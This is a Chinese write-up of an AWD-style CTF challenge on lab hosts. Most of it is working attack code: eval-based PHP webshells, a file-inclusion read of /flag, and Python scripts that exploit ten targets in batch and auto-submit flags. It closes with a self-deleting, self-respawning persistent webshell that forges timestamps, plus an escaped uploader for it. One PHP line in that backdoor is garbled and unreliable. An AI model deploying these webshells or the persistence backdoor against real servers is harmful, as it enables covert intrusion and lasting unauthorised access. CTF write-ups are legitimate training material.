【AWD】 yunnan_simple WriteUp

题目环境:

靶机IP: 192.168.2.146

SSH端口: 2201-2210

Web端口: 8801-8810

flag提交地址: 192.168.2.146:8080

flag提交api: 192.168.2.146:8080/flag_file.php?token=队伍token&flag=获取到的flag

D盾漏洞

【AWD】 yunnan_simple WriteUp

漏洞1——.a.php

漏洞详情:

<?php @eval($_REQUEST['c']);
?>

【AWD】 yunnan_simple WriteUp

可以看到是一句话木马。

漏洞利用:

list目录:192.168.2.146:8801/.a.php?c=system(ls);

cat flag:192.168.2.146:8801/.a.php?c=system(“cat /flag”);

【AWD】 yunnan_simple WriteUp

批量获取flag + 提交flag 脚本:

# 192.168.2.146:8801/.a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/.a.php'

for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        print(res.text)
        flag_payload = { "token" : "team1" , "flag" : res.text}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php" , params = flag_payload)

【AWD】 yunnan_simple WriteUp

【AWD】 yunnan_simple WriteUp

漏洞2——a.php

漏洞详情:

<?php @eval($_REQUEST['c']);
var_dump($_SERVER);
?>

【AWD】 yunnan_simple WriteUp

漏洞利用:

和上一个差不多,但是比上一个.a.php多了var_dump(),因此在获得flag的时候,需要做正则匹配(也可以截取字符串= =、

【AWD】 yunnan_simple WriteUp

批量获取flag并提交脚本:

# 192.168.2.146:8801/a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/a.php'

for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞3——about.php

漏洞详情:

<?php
	$file=$_GET['file'];
	include $file;
?>

【AWD】 yunnan_simple WriteUp

很显然是一个文件包含漏洞:

【AWD】 yunnan_simple WriteUp

【AWD】 yunnan_simple WriteUp

脚本如下:

# http://192.168.2.146:8801/about.php?file=/flag

import requests

url1 = "http://192.168.2.146:"
url2 = '/about.php'

for i in range(1 , 11):
    payload = { "file" : '/flag'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞4——config.php

【AWD】 yunnan_simple WriteUp

还是一句话木马

脚本如下:

# http://192.168.2.146:8801/config.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/config.php'

for i in range(1 , 11):
    payload = { "c" : 'system("cat /flag");'}
    url = url1 + str(8800 + i) + url2
    try:
        res = requests.get(url, params = payload)
    except:
        continue
    else:
        flag = res.text[0:32]
        print(flag)
        flag_payload = {"token": "team1", "flag": flag}
        submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

利用一句话木马批量上传不死马

  • PHP版本不死马:

<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '2.php'; $code = '<?php if(md5($_GET["pass"])=="1ac3544114c9c5e2853a183138093e5e"){@eval($_POST[coin]);} ?>';

while (1){
file_put_contents( f i l e , file, file,code);
system(‘touch -m -d “2018-12-01 09:10:12” .2.php’);
usleep(5000);
}
?>
```

  • 在hackbar中上传不死马(假设有密码c为一句话木马的密码

    其中stripslashes()为反转义函数

    c=file_put_contents("bsm.php",stripslashes("<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\$file = \'2.php\';\$code = \'<?php if(md5(\$_GET[\"pass\"])==\"1ac3544114c9c5e2853a183138093e5e\"){@eval(\$_POST[\"coin\"]);} ?>\';while (1){ file_put_contents(\$file,\$code); system(\'touch -m -d \"2018-12-01 09:10:12\" .2.php\'); usleep(5000);} ?>"));
    
  • 由于批量上传不死马,需要用到Python,因此对上方的PHP不死马需要进行二次转义

    file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));
    
  • 最终的python脚本

    import time
    import requests
    
    url1 = "http://192.168.2.146:"
    
    url2 = "/.a.php"   #这里的.a.php里有一句话木马 @eval($_REQUEST['c']);
    
    for i in range(1,11):
        print("*****************************")
        url = url1 + str(8800 + i) + url2
        hack = "file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));"
        data = {
            "c" : hack
        }
        try:
            upload_res = requests.post(url , data=data)
    
        except:
            continue
        else:
            print("端口号为" + str(8800 + i) + "的机器不死马上传成功" )
            requests_url = url1 + str(8800 + i) + "/bsm.php"  # 访问不死马
            try:
                requests_res = requests.get(requests_url , timeout = 5)
            except:
                time.sleep(6) #程序停止6秒用于生成不死马2.php
                print("-------开始访问不死马获取flag:")
                get_flag_url = url1 + str(8800+i) + "/2.php?pass=7coin@1202"
                get_flag_data = {
                    "coin" : "system(\"cat /flag\");"
                }
                get_flag_res = requests.post(get_flag_url , data=get_flag_data)
                print("端口号为"+str(8800+i)+"的机器flag为:"+get_flag_res.text[0:32])
                flag_payload = {"token": "team1", "flag": get_flag_res.text[0:32]}
                submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
                print("flag提交成功!!!!!!!!!")
    

其余漏洞:

【AWD】 yunnan_simple WriteUp

上一篇:解决ubuntu和win10双系统时间不一致


下一篇:bugku-writeup-MISC-白哥的鸽子